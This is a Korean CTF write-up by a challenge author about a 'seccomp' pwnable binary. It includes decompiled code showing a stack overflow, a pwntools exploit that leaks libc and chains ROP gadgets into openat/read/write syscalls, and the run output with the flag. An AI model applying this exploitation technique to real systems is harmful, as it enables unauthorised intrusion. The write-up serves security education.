Summary
simple trick
seccomp syscall
openat()
다른 출제자분들이 문제를 너무 빡시게내셔서 나도 빡시게 내야하나 싶었다.
근데 그냥 쉬운문제 하나 있어야겠다 싶어서 쉬운거 하나 냈다.
원래 getdents함수를 이용해서 플래그 패스를 찾게 하려고 했으나 그냥 쉽게 냈다.
main()
int __cdecl main(int argc, const char **argv, const char **envp)
{
char buf; // [rsp+0h] [rbp-110h]
int v5; // [rsp+100h] [rbp-10h]
int v6; // [rsp+104h] [rbp-Ch]
int v7; // [rsp+108h] [rbp-8h]
int i; // [rsp+10Ch] [rbp-4h]
if ( !count )
setup();
v5 = 0;
v7 = 0;
v6 = 0;
for ( i = 0; i <= 1; ++i )
{
printf("Input your age : ");
v7 = _isoc99_scanf("%u", &v5);
if ( v7 )
{
puts("Hello baby!");
printf("What's your name? : ", &v5);
read(0, &buf, 0x200uLL);
puts("Okay! I know how you are now, baby :)");
}
else
{
puts("Hello adult!");
printf("What's your name? : ", &v5);
read(0, adult, 0x200uLL);
v6 = strlen(adult);
if ( v6 != 5 )
{
puts("Are you Korean?");
exit(1);
}
puts("Okay! I know how you are now, adult :)");
}
}
return 0;
}매우 평범한 스택 오버플로우가 나는 바이너리라고 할 수 있다.
인텐은 scanf가 +,-같은 값을 입력받으면 0을 리턴하는 것을 이용하여 BSS영역인 adult에 flag path를 적어두고 간단하게 Syscall ROP를 하면서 openat으로 ORW를 하는것 이였다.
하지만 그냥 libc leak하고 read(0,adult,0x100)요런식으로 트릭 우회하고 바로 adult에 입력받아서 푸시 분들도 꽤 계셨다.
아 그리고 문제 설명에 플래그 경로를 그냥 주면 노잼이라, string부분에 숨겨놨다.
물론 문제 설명에 string보라고 써놨다 ㅎㅎ.
encrypt : hint is encrypted by Base64!
hint : L2hvbWUvc2VjY29tcC9mbGFn이 경로로 ORW하면 된다.
Exploit
from pwn import *
import base64
#context.log_level = "debug"
e = ELF("./seccomp")
libc = ELF("./libc.so.6")
#libc = e.libc
#r = remote("211.239.124.246", 12403)
r = process("./seccomp")
pop_rsi = 0x0000000000400eb1 # pop rsi ; pop r15 ; ret
pop_rdi = 0x0000000000400eb3 # pop rdi ; ret
path = base64.b64decode("L2hvbWUvc2VjY29tcC9mbGFn")
#path = base64.b64decode("L2hvbWUvc2VjY29tcC9mbGFn")
bss = 0x602060
log.info("flag path : " + path)
main = 0x400a96
payload = ""
payload += "AAAAA\x00AA"
payload += path + "\x00"
r.sendlineafter("Input your age : ","+")
r.sendafter("What's your name? : ",payload)
# build flag path
payload = ""
payload += "A" * 0x118
payload += p64(pop_rdi)
payload += p64(e.got["puts"])
payload += p64(e.plt["puts"])
payload += p64(main)
r.sendlineafter("Input your age : ","123")
r.sendafter("What's your name? : ",payload)
# leak libc_base address
libc_base = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
libc_base -= libc.symbols["puts"]
log.info("libc_base : " + hex(libc_base))
pop_rax = libc_base + 0x0000000000033544
pop_rdx = libc_base + 0x0000000000001b92
pop_r10 = libc_base + 0x00000000001150a5
syscall = libc_base + 0x00000000000bc375
# find gadgets...
payload = ""
payload += "A" * 0x118
payload += p64(pop_rsi) + p64(bss + 8) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(pop_rax) + p64(257)
payload += p64(syscall)
# call openat("/home/seccomp/flag",0);
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rsi) + p64(bss + 0x100) + p64(0)
payload += p64(pop_rdx) + p64(0xa0)
payload += p64(pop_rax) + p64(0)
payload += p64(syscall)
# call read(3,bss + 0x100,0x100);
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi) + p64(bss + 0x100) + p64(0)
payload += p64(pop_rdx) + p64(0xa0)
payload += p64(pop_rax) + p64(1)
payload += p64(syscall)
# call write(1,bss + 0x100,0x100);
sleep(0.1)
pause()
r.sendlineafter("Input your age : ","123")
r.sendafter("What's your name? : ",payload)
r.interactive()그냥 libc에 있는 가젯 주섬주섬 모아서 쓰면 된다.
Flag
juntae@ubuntu:~/myproblem/how_old_are_you$ p ex.py
[*] '/home/juntae/myproblem/how_old_are_you/seccomp'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] '/home/juntae/myproblem/how_old_are_you/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process './seccomp': pid 2825
[*] flag path : /home/seccomp/flag
[*] libc_base : 0x7f9ca9de0000
[*] Paused (press any to continue)
[*] Switching to interactive mode
Okay! I know how you are now, baby :)
LAYER7{H3110_MY_NAM3_1S_OP3NAT!_AND_HOW_0LD_AR3_Y00o0o00o0o0o0ooooooo0000000000000000OOOOOOOOO00UuuuuUUUUUUUUuuuuuuuUUUU??!?!?!?!!!11111?!11111?11?}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[*] Got EOF while reading in interactive
$ 'System Hacking ( pwnable ) > CTF Write-up' 카테고리의 다른 글
| [Rctf] babyheap ( write-up ) (0) | 2019.11.04 |
|---|---|
| [Layer7 CTF] Angel-in-us ( write-up ) (0) | 2019.10.11 |
| [Timisoara CTF] Timisoara CTF Quals ( write-up ) (0) | 2019.09.22 |
| [BOB CTF] BOB CTF ( write-up ) (0) | 2019.08.27 |
| [YISF] 순천향대학교 CTF ( write-up ) (0) | 2019.08.25 |
